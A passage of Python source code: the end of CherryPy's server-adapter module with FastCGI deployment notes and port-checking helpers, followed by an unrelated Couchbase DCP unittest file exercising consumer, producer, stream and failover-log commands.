Note that you need to download and install `flup <http://trac.saddi.com/flup>`_
yourself, whether you use ``cherryd`` or not.
.. _fastcgi:
.. index:: FastCGI
FastCGI
-------
A very simple setup lets your cherry run with FastCGI.
You just need the flup library,
plus a running Apache server (with ``mod_fastcgi``) or lighttpd server.
CherryPy code
^^^^^^^^^^^^^
hello.py::
#!/usr/bin/python
import cherrypy
class HelloWorld:
\"""Sample request handler class.\"""
def index(self):
return "Hello world!"
index.exposed = True
cherrypy.tree.mount(HelloWorld())
# CherryPy autoreload must be disabled for the flup server to work
cherrypy.config.update({'engine.autoreload_on':False})
Then run :doc:`/deployguide/cherryd` with the '-f' arg::
cherryd -c <myconfig> -d -f -i hello.py
Apache
^^^^^^
At the top level in httpd.conf::
FastCgiIpcDir /tmp
FastCgiServer /path/to/cherry.fcgi -idle-timeout 120 -processes 4
And inside the relevant VirtualHost section::
# FastCGI config
AddHandler fastcgi-script .fcgi
ScriptAliasMatch (.*$) /path/to/cherry.fcgi$1
Lighttpd
^^^^^^^^
For `Lighttpd <http://www.lighttpd.net/>`_ you can follow these
instructions. Within ``lighttpd.conf`` make sure ``mod_fastcgi`` is
active within ``server.modules``. Then, within your ``$HTTP["host"]``
directive, configure your fastcgi script like the following::
$HTTP["url"] =~ "" {
fastcgi.server = (
"/" => (
"script.fcgi" => (
"bin-path" => "/path/to/your/script.fcgi",
"socket" => "/tmp/script.sock",
"check-local" => "disable",
"disable-time" => 1,
"min-procs" => 1,
"max-procs" => 1, # adjust as needed
),
),
)
} # end of $HTTP["url"] =~ "^/"
Please see `Lighttpd FastCGI Docs
<http://redmine.lighttpd.net/wiki/lighttpd/Docs:ModFastCGI>`_ for an explanation
of the possible configuration options.
"""
import sys
import time
class ServerAdapter(object):
"""Adapter for an HTTP server.
If you need to start more than one HTTP server (to serve on multiple
ports, or protocols, etc.), you can manually register each one and then
start them all with bus.start:
s1 = ServerAdapter(bus, MyWSGIServer(host='0.0.0.0', port=80))
s2 = ServerAdapter(bus, another.HTTPServer(host='127.0.0.1', SSL=True))
s1.subscribe()
s2.subscribe()
bus.start()
"""
def __init__(self, bus, httpserver=None, bind_addr=None):
self.bus = bus
self.httpserver = httpserver
self.bind_addr = bind_addr
self.interrupt = None
self.running = False
def subscribe(self):
self.bus.subscribe('start', self.start)
self.bus.subscribe('stop', self.stop)
def unsubscribe(self):
self.bus.unsubscribe('start', self.start)
self.bus.unsubscribe('stop', self.stop)
def start(self):
"""Start the HTTP server."""
if self.bind_addr is None:
on_what = "unknown interface (dynamic?)"
elif isinstance(self.bind_addr, tuple):
host, port = self.bind_addr
on_what = "%s:%s" % (host, port)
else:
on_what = "socket file: %s" % self.bind_addr
if self.running:
self.bus.log("Already serving on %s" % on_what)
return
self.interrupt = None
if not self.httpserver:
raise ValueError("No HTTP server has been created.")
# Start the httpserver in a new thread.
if isinstance(self.bind_addr, tuple):
wait_for_free_port(*self.bind_addr)
import threading
t = threading.Thread(target=self._start_http_thread)
t.setName("HTTPServer " + t.getName())
t.start()
self.wait()
self.running = True
self.bus.log("Serving on %s" % on_what)
start.priority = 75
def _start_http_thread(self):
"""HTTP servers MUST be running in new threads, so that the
main thread persists to receive KeyboardInterrupt's. If an
exception is raised in the httpserver's thread then it's
trapped here, and the bus (and therefore our httpserver)
are shut down.
"""
try:
self.httpserver.start()
except KeyboardInterrupt:
self.bus.log("<Ctrl-C> hit: shutting down HTTP server")
self.interrupt = sys.exc_info()[1]
self.bus.exit()
except SystemExit:
self.bus.log("SystemExit raised: shutting down HTTP server")
self.interrupt = sys.exc_info()[1]
self.bus.exit()
raise
except:
self.interrupt = sys.exc_info()[1]
self.bus.log("Error in HTTP server: shutting down",
traceback=True, level=40)
self.bus.exit()
raise
def wait(self):
"""Wait until the HTTP server is ready to receive requests."""
while not getattr(self.httpserver, "ready", False):
if self.interrupt:
raise self.interrupt
time.sleep(.1)
# Wait for port to be occupied
if isinstance(self.bind_addr, tuple):
host, port = self.bind_addr
wait_for_occupied_port(host, port)
def stop(self):
"""Stop the HTTP server."""
if self.running:
# stop() MUST block until the server is *truly* stopped.
self.httpserver.stop()
# Wait for the socket to be truly freed.
if isinstance(self.bind_addr, tuple):
wait_for_free_port(*self.bind_addr)
self.running = False
self.bus.log("HTTP Server %s shut down" % self.httpserver)
else:
self.bus.log("HTTP Server %s already shut down" % self.httpserver)
stop.priority = 25
def restart(self):
"""Restart the HTTP server."""
self.stop()
self.start()
class FlupCGIServer(object):
"""Adapter for a flup.server.cgi.WSGIServer."""
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
self.ready = False
def start(self):
"""Start the CGI server."""
# We have to instantiate the server class here because its __init__
# starts a threadpool. If we do it too early, daemonize won't work.
from flup.server.cgi import WSGIServer
self.cgiserver = WSGIServer(*self.args, **self.kwargs)
self.ready = True
self.cgiserver.run()
def stop(self):
"""Stop the HTTP server."""
self.ready = False
class FlupFCGIServer(object):
"""Adapter for a flup.server.fcgi.WSGIServer."""
def __init__(self, *args, **kwargs):
if kwargs.get('bindAddress', None) is None:
import socket
if not hasattr(socket, 'fromfd'):
raise ValueError(
'Dynamic FCGI server not available on this platform. '
'You must use a static or external one by providing a '
'legal bindAddress.')
self.args = args
self.kwargs = kwargs
self.ready = False
def start(self):
"""Start the FCGI server."""
# We have to instantiate the server class here because its __init__
# starts a threadpool. If we do it too early, daemonize won't work.
from flup.server.fcgi import WSGIServer
self.fcgiserver = WSGIServer(*self.args, **self.kwargs)
# TODO: report this bug upstream to flup.
# If we don't set _oldSIGs on Windows, we get:
# File "C:\Python24\Lib\site-packages\flup\server\threadedserver.py",
# line 108, in run
# self._restoreSignalHandlers()
# File "C:\Python24\Lib\site-packages\flup\server\threadedserver.py",
# line 156, in _restoreSignalHandlers
# for signum,handler in self._oldSIGs:
# AttributeError: 'WSGIServer' object has no attribute '_oldSIGs'
self.fcgiserver._installSignalHandlers = lambda: None
self.fcgiserver._oldSIGs = []
self.ready = True
self.fcgiserver.run()
def stop(self):
"""Stop the HTTP server."""
# Forcibly stop the fcgi server main event loop.
self.fcgiserver._keepGoing = False
# Force all worker threads to die off.
self.fcgiserver._threadPool.maxSpare = self.fcgiserver._threadPool._idleCount
self.ready = False
class FlupSCGIServer(object):
"""Adapter for a flup.server.scgi.WSGIServer."""
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
self.ready = False
def start(self):
"""Start the SCGI server."""
# We have to instantiate the server class here because its __init__
# starts a threadpool. If we do it too early, daemonize won't work.
from flup.server.scgi import WSGIServer
self.scgiserver = WSGIServer(*self.args, **self.kwargs)
# TODO: report this bug upstream to flup.
# If we don't set _oldSIGs on Windows, we get:
# File "C:\Python24\Lib\site-packages\flup\server\threadedserver.py",
# line 108, in run
# self._restoreSignalHandlers()
# File "C:\Python24\Lib\site-packages\flup\server\threadedserver.py",
# line 156, in _restoreSignalHandlers
# for signum,handler in self._oldSIGs:
# AttributeError: 'WSGIServer' object has no attribute '_oldSIGs'
self.scgiserver._installSignalHandlers = lambda: None
self.scgiserver._oldSIGs = []
self.ready = True
self.scgiserver.run()
def stop(self):
"""Stop the HTTP server."""
self.ready = False
# Forcibly stop the scgi server main event loop.
self.scgiserver._keepGoing = False
# Force all worker threads to die off.
self.scgiserver._threadPool.maxSpare = 0
def client_host(server_host):
"""Return the host on which a client can connect to the given listener."""
if server_host == '0.0.0.0':
# 0.0.0.0 is INADDR_ANY, which should answer on localhost.
return '127.0.0.1'
if server_host in ('::', '::0', '::0.0.0.0'):
# :: is IN6ADDR_ANY, which should answer on localhost.
# ::0 and ::0.0.0.0 are non-canonical but common ways to write IN6ADDR_ANY.
return '::1'
return server_host
def check_port(host, port, timeout=1.0):
"""Raise an error if the given port is not free on the given host."""
if not host:
raise ValueError("Host values of '' or None are not allowed.")
host = client_host(host)
port = int(port)
import socket
# AF_INET or AF_INET6 socket
# Get the correct address family for our host (allows IPv6 addresses)
try:
info = socket.getaddrinfo(host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM)
except socket.gaierror:
if ':' in host:
info = [(socket.AF_INET6, socket.SOCK_STREAM, 0, "", (host, port, 0, 0))]
else:
info = [(socket.AF_INET, socket.SOCK_STREAM, 0, "", (host, port))]
for res in info:
af, socktype, proto, canonname, sa = res
s = None
try:
s = socket.socket(af, socktype, proto)
# See http://groups.google.com/group/cherrypy-users/
# browse_frm/thread/bbfe5eb39c904fe0
s.settimeout(timeout)
s.connect((host, port))
s.close()
raise IOError("Port %s is in use on %s; perhaps the previous "
"httpserver did not shut down properly." %
(repr(port), repr(host)))
except socket.error:
if s:
s.close()
# Feel free to increase these defaults on slow systems:
free_port_timeout = 0.1
occupied_port_timeout = 1.0
def wait_for_free_port(host, port, timeout=None):
"""Wait for the specified port to become free (drop requests)."""
if not host:
raise ValueError("Host values of '' or None are not allowed.")
if timeout is None:
timeout = free_port_timeout
for trial in range(50):
try:
# we are expecting a free port, so reduce the timeout
check_port(host, port, timeout=timeout)
except IOError:
# Give the old server thread time to free the port.
time.sleep(timeout)
else:
return
raise IOError("Port %r not free on %r" % (port, host))
def wait_for_occupied_port(host, port, timeout=None):
"""Wait for the specified port to become active (receive requests)."""
if not host:
raise ValueError("Host values of '' or None are not allowed.")
if timeout is None:
timeout = occupied_port_timeout
for trial in range(50):
try:
check_port(host, port, timeout=timeout)
except IOError:
return
else:
time.sleep(timeout)
raise IOError("Port %r not bound on %r" % (port, host))
|
dcp_tests.py | from dcp_base import DCPBase
from dcp_new.constants import *
from dcp_bin_client import *
from mc_bin_client import MemcachedClient as McdClient
from memcached.helper.data_helper import MemcachedClientHelper
import unittest
from memcacheConstants import *
from threading import Thread
from remote.remote_util import RemoteMachineShellConnection
from datetime import datetime
class DcpTestCase(DCPBase):
def setUp(self):
super(DCPBase, self).setUp()
self.remote_shell = RemoteMachineShellConnection(self.cluster.master)
# Create default bucket and add rbac user
self.bucket_util.create_default_bucket()
bucket_name = "default"
self.bucket_util.add_rbac_user()
self.sleep(30)
self.dcp_client = DcpClient(host=self.cluster.master.ip)
self.dcp_client.sasl_auth_plain("cbadminbucket","password")
self.dcp_client.bucket_select(bucket_name)
self.mcd_client = MemcachedClientHelper.direct_client(self.cluster.master, self.bucket_util.buckets[0])
def tearDown(self):
self.dcp_client.close()
self.mcd_client.close()
"""Basic dcp open consumer connection test
Verifies that when the open dcp consumer command is used there is a
connection instance that is created on the server and that when the
tcp connection is closed the connection is remove from the server"""
def test_open_consumer_connection_command(self):
response = self.dcp_client.open_consumer("mystream")
print("response: {0}".format(response))
assert response['status'] == SUCCESS
response = self.mcd_client.stats('dcp')
print("response: {0}".format(response))
assert response['eq_dcpq:mystream:type'] == 'consumer'
self.dcp_client.close()
self.sleep(1)
response = self.mcd_client.stats('dcp')
print("response: {0}".format(response))
assert 'eq_dcpq:mystream:type' not in response
"""Basic dcp open producer connection test
Verifies that when the open dcp producer command is used there is a
connection instance that is created on the server and that when the
tcp connection is closed the connection is remove from the server"""
def test_open_producer_connection_command(self):
response = self.dcp_client.open_producer("mystream")
print("response: {0}".format(response))
assert response['status'] == SUCCESS
response = self.mcd_client.stats('dcp')
print("response: {0}".format(response))
assert response['eq_dcpq:mystream:type'] == 'producer'
self.dcp_client.close()
self.sleep(1)
response = self.mcd_client.stats('dcp')
print("response: {0}".format(response))
assert 'eq_dcpq:mystream:type' not in response
def test_open_notifier_connection_command(self):
"""Basic dcp open notifier connection test
Verifies that when the open dcp noifier command is used there is a
connection instance that is created on the server and that when the
tcp connection is closed the connection is remove from the server"""
response = self.dcp_client.open_notifier("notifier")
print("response: {0}".format(response))
assert response['status'] == SUCCESS
response = self.mcd_client.stats('dcp')
print("response: {0}".format(response))
assert response['eq_dcpq:notifier:type'] == 'notifier'
self.dcp_client.close()
self.sleep(1)
response = self.mcd_client.stats('dcp')
print("response: {0}".format(response))
assert 'eq_dcpq:mystream:type' not in response
"""Open consumer connection same key
Verifies a single consumer connection can be opened. Then opens a
second consumer connection with the same key as the original. Expects
that the first consumer connection is closed. Stats should reflect 1
consumer connected
"""
def test_open_consumer_connection_same_key(self):
stream = "mystream"
self.dcp_client.open_consumer(stream)
c1_stats = self.mcd_client.stats('dcp')
assert c1_stats['eq_dcpq:' + stream + ':type'] == 'consumer'
self.sleep(2)
c2_stats = None
for i in range(10):
self.dcp_client = DcpClient(self.cluster.master.ip, self.cluster.master.port)
response = self.dcp_client.open_consumer(stream)
assert response['status'] == SUCCESS
c2_stats = self.mcd_client.stats('dcp')
assert c2_stats is not None
assert c2_stats['eq_dcpq:' + stream + ':type'] == 'consumer'
assert c2_stats['ep_dcp_count'] == '1'
assert c1_stats['eq_dcpq:' + stream + ':created'] < \
c2_stats['eq_dcpq:' + stream + ':created']
"""Open producer same key
Verifies a single producer connection can be opened. Then opens a
second consumer connection with the same key as the original. Expects
that the first producer connection is closed. Stats should reflect 1
producer connected.
"""
@unittest.skip("Needs Debug")
def test_open_producer_connection_same_key(self):
stream = "mystream"
self.dcp_client.open_producer(stream)
c1_stats = self.mcd_client.stats('dcp')
assert c1_stats['eq_dcpq:' + stream + ':type'] == 'producer'
self.sleep(2)
c2_stats = None
for i in range(10):
conn = DcpClient(self.cluster.master.ip, self.cluster.master.port)
response = conn.open_producer(stream)
assert response['status'] == SUCCESS
c2_stats = self.mcd_client.stats('dcp')
assert c2_stats['eq_dcpq:' + stream + ':type'] == 'producer'
# CBQE-3410 1 or 2 is ok
assert c2_stats['ep_dcp_count'] == '1' or c2_stats['ep_dcp_count'] == '2'
assert c1_stats['eq_dcpq:' + stream + ':created'] < \
c2_stats['eq_dcpq:' + stream + ':created']
""" Open consumer empty name
Tries to open a consumer connection with empty string as name. Expects
to recieve a client error.
"""
def test_open_consumer_no_name(self):
response = self.dcp_client.open_consumer("")
assert response['status'] == ERR_EINVAL
""" Open producer empty name
Tries to open a producer connection with empty string as name. Expects
to recieve a client error.
"""
def test_open_producer_no_name(self):
response = self.dcp_client.open_producer("")
assert response['status'] == ERR_EINVAL
""" Open n producers and consumers
Open n consumer and n producer connections. Check dcp stats and verify number
of open connections = 2n with corresponding values for each conenction type.
Expects each open connection response return true.
"""
def test_open_n_consumer_producers(self):
n = 16
conns = [DcpClient(self.cluster.master.ip, self.cluster.master.port) for i in xrange(2 * n)]
ops = []
for i in xrange(n):
op = conns[i].open_consumer("consumer{0}".format(i))
ops.append(op)
op = conns[n + i].open_producer("producer{0}".format(n + i))
ops.append(op)
for op in ops:
assert op['status'] == SUCCESS
stats = self.mcd_client.stats('dcp')
assert stats['ep_dcp_count'] == str(n * 2)
def test_open_notifier(self):
response = self.dcp_client.open_notifier("notifier")
assert response['status'] == SUCCESS
def test_open_notifier_no_name(self):
response = self.dcp_client.open_notifier("")
assert response['status'] == ERR_EINVAL
"""Basic add stream test
This test verifies a simple add stream command. It expects that a stream
request message will be sent to the producer before a response for the
add stream command is returned."""
@unittest.skip("invalid: MB-11890")
def test_add_stream_command(self):
response = self.dcp_client.open_consumer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.add_stream(0, 0)
assert response['status'] == SUCCESS
@unittest.skip("invalid: MB-11890")
def test_add_stream_reopen_connection(self):
for i in range(10):
response = self.dcp_client.open_consumer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.add_stream(0, 0)
assert response['status'] == SUCCESS
self.dcp_client.reconnect()
"""Add stream to producer
Attempt to add stream to a producer connection. Expects to recieve
client error response."""
@unittest.skip("invalid: MB-11890")
def test_add_stream_to_producer(self):
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.add_stream(0, 0)
assert response['status'] == ERR_ECLIENT
"""Add stream test without open connection
This test attempts to add a stream without idnetifying the
client as a consumer or producer. Excepts request
to throw client error"""
@unittest.skip("invalid: MB-11890")
def test_add_stream_without_connection(self):
response = self.dcp_client.add_stream(0, 0)
assert response['status'] == ERR_ECLIENT
"""Add stream command with no consumer vbucket
Attempts to add a stream when no vbucket exists on the consumer. The
client shoudl expect a not my vbucket response immediately"""
@unittest.skip("invalid: MB-11890")
def test_add_stream_not_my_vbucket(self):
response = self.dcp_client.open_consumer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.add_stream(1025, 0)
assert response['status'] == ERR_NOT_MY_VBUCKET
"""Add stream when stream exists
Creates a stream and then attempts to create another stream for the
same vbucket. Expects to fail with an exists error."""
@unittest.skip("invalid: MB-11890")
def test_add_stream_exists(self):
response = self.dcp_client.open_consumer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.add_stream(0, 0)
assert response['status'] == SUCCESS
response = self.dcp_client.add_stream(0, 0)
assert response['status'] == ERR_KEY_EEXISTS
"""Add stream to new consumer
Creates two clients each with consumers using the same key.
Attempts to add stream to first consumer and second consumer.
Expects that adding stream to second consumer passes"""
@unittest.skip("invalid: MB-11890")
def test_add_stream_to_duplicate_consumer(self):
response = self.dcp_client.open_consumer("mystream")
assert response['status'] == SUCCESS
dcp_client2 = DcpClient(self.cluster.master.ip, self.cluster.master.port)
response = dcp_client2.open_consumer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.add_stream(0, 0)
assert response['status'] == ERR_ECLIENT
response = dcp_client2.add_stream(0, 0)
assert response['status'] == SUCCESS
dcp_client2.close()
"""
Add a stream to consumer with the takeover flag set = 1. Expects add stream
command to return successfully.
"""
@unittest.skip("invalid: MB-11890")
def test_add_stream_takeover(self):
response = self.dcp_client.open_consumer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.add_stream(0, 1)
assert response['status'] == SUCCESS
"""
Open n consumer connection. Add one stream to each consumer for the same
vbucket. Expects every add stream request to succeed.
"""
@unittest.skip("invalid: MB-11890")
def test_add_stream_n_consumers_1_stream(self):
n = 16
self.verification_seqno = n
conns = [DcpClient(self.cluster.master.ip, self.cluster.master.port) for i in xrange(n)]
for i in xrange(n):
response = self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
stream = "mystream{0}".format(i)
response = conns[i].open_consumer(stream)
assert response['status'] == SUCCESS
response = conns[i].add_stream(0, 1)
assert response['status'] == SUCCESS
stats = self.mcd_client.stats('dcp')
assert stats['ep_dcp_count'] == str(n)
self.wait_for_persistence(self.mcd_client)
"""
Open n consumer connection. Add n streams to each consumer for unique vbucket
per connection. Expects every add stream request to succeed.
"""
@unittest.skip("invalid: MB-11890")
def test_add_stream_n_consumers_n_streams(self):
n = 8
self.verification_seqno = n
vb_ids = self.all_vbucket_ids()
conns = [DcpClient(self.cluster.master.ip, self.cluster.master.port) for i in xrange(n)]
for i in xrange(n):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
stream = "mystream{0}".format(i)
response = conns[i].open_consumer(stream)
assert response['status'] == SUCCESS
for vb in vb_ids[0:n]:
response = conns[i].add_stream(vb, 0)
assert response['status'] == SUCCESS
stats = self.mcd_client.stats('dcp')
assert stats['ep_dcp_count'] == str(n)
"""
Open a single consumer and add stream for all active vbuckets with the
takeover flag set in the request. Expects every add stream request to succeed.
"""
@unittest.skip("invalid: MB-11890")
def test_add_stream_takeover_all_vbuckets(self):
response = self.dcp_client.open_consumer("mystream")
assert response['status'] == SUCCESS
# parsing keys: 'vb_1', 'vb_0',...
vb_ids = self.all_vbucket_ids()
for i in vb_ids:
response = self.dcp_client.add_stream(i, 1)
assert response['status'] == SUCCESS
@unittest.skip("invalid: MB-11890")
def test_add_stream_various_ops(self):
""" verify consumer can receive mutations created by various mcd ops """
response = self.dcp_client.open_consumer("mystream")
assert response['status'] == SUCCESS
val = 'base-'
self.mcd_client.set('key', 0, 0, val, 0)
for i in range(100):
# append + prepend
self.mcd_client.append('key', str(i), 0, 0)
val += str(i)
self.mcd_client.prepend('key', str(i), 0, 0)
val = str(i) + val
self.mcd_client.incr('key2', init=0, vbucket=0)
for i in range(100):
self.mcd_client.incr('key2', amt=2, vbucket=0)
for i in range(100):
self.mcd_client.decr('key2', amt=2, vbucket=0)
response = self.dcp_client.add_stream(0, 0)
assert response['status'] == SUCCESS
stats = self.mcd_client.stats('dcp')
mutations = stats['eq_dcpq:mystream:stream_0_start_seqno']
assert mutations == '402'
self.verification_seqno = 402
def test_stream_request_deduped_items(self):
""" request a duplicate mutation """
response = self.dcp_client.open_producer("mystream")
# get vb uuid
response = self.mcd_client.stats('failovers')
vb_uuid = long(response['vb_0:0:id'])
self.mcd_client.set('snap1', 0, 0, 'value1', 0)
self.mcd_client.set('snap1', 0, 0, 'value2', 0)
self.mcd_client.set('snap1', 0, 0, 'value3', 0)
# attempt to request mutations 1 and 2
start_seqno = 1
end_seqno = 2
stream = self.dcp_client.stream_req(0, 0,
start_seqno,
end_seqno,
vb_uuid)
assert stream.status is SUCCESS
stream.run()
assert stream.last_by_seqno == 3
self.verification_seqno == 3
def test_stream_request_dupe_backfilled_items(self):
""" request mutations across memory/backfill mutations"""
self.dcp_client.open_producer("mystream")
def load(i):
""" load 3 and persist """
set_ops = [self.mcd_client.set('key%s' % i, 0, 0, 'value', 0) \
for x in range(3)]
self.wait_for_persistence(self.mcd_client)
def stream(end, vb_uuid):
backfilled = False
# send a stream request mutations from 1st snapshot
stream = self.dcp_client.stream_req(0, 0, 0, end, vb_uuid)
# check if items were backfilled before streaming
stats = self.mcd_client.stats('dcp')
num_backfilled = \
int(stats['eq_dcpq:mystream:stream_0_backfill_sent'])
if num_backfilled > 0:
backfilled = True
stream.run() # exaust stream
assert stream.has_response() == False
self.dcp_client.close_stream(0)
return backfilled
# get vb uuid
resp = self.mcd_client.stats('failovers')
vb_uuid = long(resp['vb_0:0:id'])
# load stream snapshot 1
load('a')
stream(3, vb_uuid)
# load some more items
load('b')
# attempt to stream until request contains backfilled items
tries = 10
backfilled = stream(4, vb_uuid)
while not backfilled and tries > 0:
tries -= 1
self.sleep(2)
backfilled = stream(4, vb_uuid)
assert backfilled, "ERROR: no back filled items were streamed"
self.verification_seqno = 6
def test_backfill_from_default_vb_uuid(self):
""" attempt a backfill stream request using vb_uuid = 0 """
def disk_stream():
stream = self.dcp_client.stream_req(0, 0, 0, 1, 0)
last_by_seqno = 0
persisted = False
assert stream.status is SUCCESS
snap = stream.next_response()
if snap['flag'].find('disk') == 0:
persisted = True
return persisted
self.dcp_client.open_producer("mystream")
self.mcd_client.set('key', 0, 0, 'value', 0)
tries = 20
while tries > 0 and not disk_stream():
tries -= 1
self.sleep(1)
assert tries > 0, "Items never persisted to disk"
"""Close stream that has not been initialized.
Expects client error."""
@unittest.skip("Needs Debug")
def test_close_stream_command(self):
response = self.dcp_client.close_stream(0)
assert response['status'] == ERR_ECLIENT
"""Close a consumer stream. Expects close operation to
return a success."""
@unittest.skip("invalid: MB-11890")
def test_close_consumer_stream(self):
response = self.dcp_client.open_consumer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.add_stream(0, 0)
assert response['status'] == SUCCESS
response = self.dcp_client.close_stream(0)
assert response['status'] == SUCCESS
"""
Open a consumer connection. Add stream for a selected vbucket. Then close stream.
Immediately after closing stream send a request to add stream again. Expects that
stream can be added after closed.
"""
@unittest.skip("invalid: MB-11890")
def test_close_stream_reopen(self):
response = self.dcp_client.open_consumer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.add_stream(0, 0)
assert response['status'] == SUCCESS
response = self.dcp_client.add_stream(0, 0)
assert response['status'] == ERR_KEY_EEXISTS
response = self.dcp_client.close_stream(0)
assert response['status'] == SUCCESS
response = self.dcp_client.add_stream(0, 0)
assert response['status'] == SUCCESS
"""
open and close stream as a consumer then takeover
stream as producer and attempt to reopen stream
from same vbucket
"""
@unittest.skip("invalid scenario: MB-11785")
def test_close_stream_reopen_as_producer(self):
response = self.dcp_client.open_consumer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.add_stream(0, 0)
assert response['status'] == SUCCESS
response = self.dcp_client.close_stream(0)
assert response['status'] == SUCCESS
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.stream_req(0, 0, 0, 0, 0, 0)
assert response.status == SUCCESS
response = self.dcp_client.open_consumer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.close_stream(0)
assert response['status'] == ERR_KEY_ENOENT
"""
Add stream to a consumer connection for a selected vbucket. Start sending ops to node.
Send close stream command to selected vbucket. Expects that consumer has not recieved any
subsequent mutations after producer recieved the close request.
"""
def test_close_stream_with_ops(self):
stream_closed = False
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
doc_count = 1000
for i in range(doc_count):
self.mcd_client.set('key%s' % i, 0, 0, 'value', 0)
stream = self.dcp_client.stream_req(0, 0, 0, doc_count, 0)
while stream.has_response():
response = stream.next_response()
if not stream_closed:
response = self.dcp_client.close_stream(0)
assert response['status'] == SUCCESS, response
stream_closed = True
if response is None:
break
assert stream.last_by_seqno < doc_count, \
"Error: recieved all mutations on closed stream"
self.verification_seqno = doc_count
"""
Sets up a consumer connection. Adds stream and then sends 2 close stream requests. Expects
second request to close stream returns noent
"""
def test_close_stream_twice(self):
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.stream_req(0, 0, 0, 1000, 0)
assert response.status == SUCCESS
response = self.dcp_client.close_stream(0)
assert response['status'] == SUCCESS
response = self.dcp_client.close_stream(0)
assert response['status'] == ERR_KEY_ENOENT
"""
Test verifies that if multiple consumers are streaming from a vbucket
that if one of the consumer closes then the producer doesn't stop
sending changes to other consumers
"""
@unittest.skip("invalid: MB-11890")
def test_close_stream_n_consumers(self):
n = 16
for i in xrange(100):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
self.wait_for_persistence(self.mcd_client)
# add stream to be close by different client
client2 = DcpClient(self.cluster.master.ip, self.cluster.master.port)
closestream = "closestream"
client2.open_consumer(closestream)
client2.add_stream(0, 0)
conns = [DcpClient(self.cluster.master.ip, self.cluster.master.port) for i in xrange(n)]
for i in xrange(n):
stream = "mystream{0}".format(i)
conns[i].open_consumer(stream)
conns[i].add_stream(0, 1)
if i == int(n / 2):
# close stream
response = client2.close_stream(0)
assert response['status'] == SUCCESS
self.sleep(2)
stats = self.mcd_client.stats('dcp')
key = "eq_dcpq:{0}:stream_0_state".format(closestream)
assert stats[key] == 'dead'
for i in xrange(n):
key = "eq_dcpq:mystream{0}:stream_0_state".format(i)
assert stats[key] in ('reading', 'pending')
client2.close()
self.verification_seqno = 100
"""Request failover log without connection
attempts to retrieve failover log without establishing a connection to
a producer. Expects operation is not supported"""
@unittest.skip("Needs Debug")
def test_get_failover_log_command(self):
response = self.dcp_client.get_failover_log(0)
assert response['status'] == ERR_ECLIENT
"""Request failover log from consumer
attempts to retrieve failover log from a consumer. Expects
operation is not supported."""
def test_get_failover_log_consumer(self):
response = self.dcp_client.open_consumer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.get_failover_log(0)
assert response['status'] == ERR_ECLIENT
"""Request failover log from producer
retrieve failover log from a producer. Expects to successfully recieve
failover log and for it to match dcp stats."""
def test_get_failover_log_producer(self):
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.get_failover_log(0)
assert response['status'] == SUCCESS
response = self.mcd_client.stats('failovers')
assert response['vb_0:0:seq'] == '0'
"""Request failover log from invalid vbucket
retrieve failover log from invalid vbucket. Expects to not_my_vbucket from producer."""
def test_get_failover_invalid_vbucket(self):
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.get_failover_log(1025)
assert response['status'] == ERR_NOT_MY_VBUCKET
"""Failover log during stream request
Open a producer connection and send and add_stream request with high end_seqno.
While waiting for end_seqno to be reached send request for failover log
and Expects that producer is still able to return failover log
while consumer has an open add_stream request.
"""
def test_failover_log_during_stream_request(self):
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
stream = self.dcp_client.stream_req(0, 0, 0, 100, 0)
seqno = stream.failover_log[0][1]
response = self.dcp_client.get_failover_log(0)
assert response['status'] == SUCCESS
assert response['value'][0][1] == seqno
"""Failover log with ops
Open a producer connection to a vbucket and start loading data to node.
After expected number of items have been created send request for failover
log and expect seqno to match number
"""
@unittest.skip("needs debug")
def test_failover_log_with_ops(self):
stream = "mystream"
response = self.dcp_client.open_producer(stream)
assert response['status'] == SUCCESS
stream = self.dcp_client.stream_req(0, 0, 0, 100, 0)
assert stream.status == SUCCESS
seqno = stream.failover_log[0][1]
for i in range(100):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
resp = stream.next_response()
assert resp
if (i % 10) == 0:
fail_response = self.dcp_client.get_failover_log(0)
assert fail_response['status'] == SUCCESS
assert fail_response['value'][0][1] == seqno
self.verification_seqno = 100
"""Request failover from n producers from n vbuckets
Open n producers and attempt to fetch failover log for n vbuckets on each producer.
Expects expects all requests for failover log to succeed and that the log for
similar buckets match.
"""
def test_failover_log_n_producers_n_vbuckets(self):
n = 2
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
vb_ids = self.all_vbucket_ids()
expected_seqnos = {}
for id_ in vb_ids:
# print 'id', id_
response = self.dcp_client.get_failover_log(id_)
expected_seqnos[id_] = response['value'][0][0]
# open n producers for this vbucket
for i in range(n):
stream = "mystream{0}".format(i)
conn = DcpClient(self.cluster.master.ip, self.cluster.master.port)
# print 'conn', conn
response = conn.open_producer(stream)
vbucket_id = id_
# print 'vbucket_id',vbucket_id
response = self.dcp_client.get_failover_log(vbucket_id)
assert response['value'][0][0] == expected_seqnos[vbucket_id]
"""Basic dcp stream request
Opens a producer connection and sends a stream request command for
vbucket 0. Since no items exist in the server we should accept the
stream request and then send back a stream end message."""
def test_stream_request_command(self):
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
